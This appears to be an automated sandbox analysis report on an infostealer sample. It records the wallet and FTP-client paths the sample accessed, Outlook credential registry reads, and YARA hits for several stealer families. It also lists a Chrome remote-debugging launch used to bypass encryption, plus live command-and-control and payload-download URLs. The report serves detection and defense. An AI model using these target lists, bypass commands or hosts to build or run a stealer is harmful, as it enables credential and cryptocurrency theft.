Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN

Source: Yara match	File source: 0000000E.00000003.2695338579.000000000150D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2754545310.0000000001522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2660335894.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2746364474.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2810105120.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2695385436.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2660487547.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2659619178.000000000150D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0718eb7837.exe PID: 6588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0718eb7837.exe PID: 7288, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 2922d7c574.exe PID: 4600, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0718eb7837.exe PID: 6588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0718eb7837.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2912762087.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2737911561.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1709468423.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.2825521059.00000000057C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2687883624.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2130376795.0000000000C11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aedbd2e320.exe PID: 5956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aedbd2e320.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C640C40 sqlite3_bind_zeroblob,	0_2_6C640C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C640D60 sqlite3_bind_parameter_name,	0_2_6C640D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C568EA0 sqlite3_clear_bindings,	0_2_6C568EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C640B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C640B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C566410 bind,WSAGetLastError,	0_2_6C566410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C56C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C56C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C566070 PR_Listen,	0_2_6C566070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C56C030 sqlite3_bind_parameter_count,	0_2_6C56C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5660B0 listen,WSAGetLastError,	0_2_6C5660B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F22D0 sqlite3_bind_blob,	0_2_6C4F22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5663C0 PR_Bind,	0_2_6C5663C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C569400 sqlite3_bind_int64,	0_2_6C569400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5694C0 sqlite3_bind_text,	0_2_6C5694C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5694F0 sqlite3_bind_text16,	0_2_6C5694F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C569480 sqlite3_bind_null,	0_2_6C569480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	311 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	2 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	3 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	12 Process Injection	12 Software Packing	NTDS	249 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	871 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	361 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	361 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	42%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	42%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	34%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	34%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	32%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	34%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	34%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	32%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	42%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://185.215.113.206C	0%	Avira URL Cloud	safe
http://185.215.113.206A	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exe9	0%	Avira URL Cloud	safe
https://property-imper.sbs/l	0%	Avira URL Cloud	safe
https://property-imper.sbs:443/api	0%	Avira URL Cloud	safe
https://property-imper.sbs/apiatePr	0%	Avira URL Cloud	safe
http://185.215.113.206/c4becf79229cb002.phpHu8	100%	Avira URL Cloud	malware
https://property-imper.sbs:443/apin	0%	Avira URL Cloud	safe
http://185.215.113.206/c4becf79229cb002.phpR%	100%	Avira URL Cloud	malware
https://property-imper.sbs/api	0%	Avira URL Cloud	safe
http://185.215.113.206ones	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php8254001	100%	Avira URL Cloud	malware
http://185.215.113.16:80/off/def.exeault-release/key4.dbPK	0%	Avira URL Cloud	safe
https://property-imper.sbs:443/apiK	0%	Avira URL Cloud	safe
http://185.215.113.206/c4becf79229cb002.php/K	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpN_)	100%	Avira URL Cloud	malware
https://property-imper.sbs/4	0%	Avira URL Cloud	safe
http://31.41.244.11/files/rnd.exe	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/mozglue.dll_	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
star-mini.c10r.facebook.com	157.240.196.35	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
twitter.com	104.244.42.1	true	false	high
home.fvtekk5pn.top	34.116.198.130	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
plus.l.google.com	172.217.17.78	true	false	high
property-imper.sbs	172.67.162.84	true	false	high
dyna.wikimedia.org	185.15.58.224	true	false	high
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	high
fvtekk5pn.top	34.116.198.130	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
youtube.com	142.250.181.78	true	false	high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
youtube-ui.l.google.com	172.217.19.206	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
reddit.map.fastly.net	151.101.1.140	true	false	high
ipv4only.arpa	192.0.0.170	true	false	high
push.services.mozilla.com	34.107.243.93	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
www.google.com	142.250.181.100	true	false	high
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	high
www.reddit.com	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
firefox.settings.services.mozilla.com	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
shavar.services.mozilla.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false		high
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347	false		high
https://property-imper.sbs/api	true	Avira URL Cloud: safe	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/c4becf79229cb002.phpHu8	aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
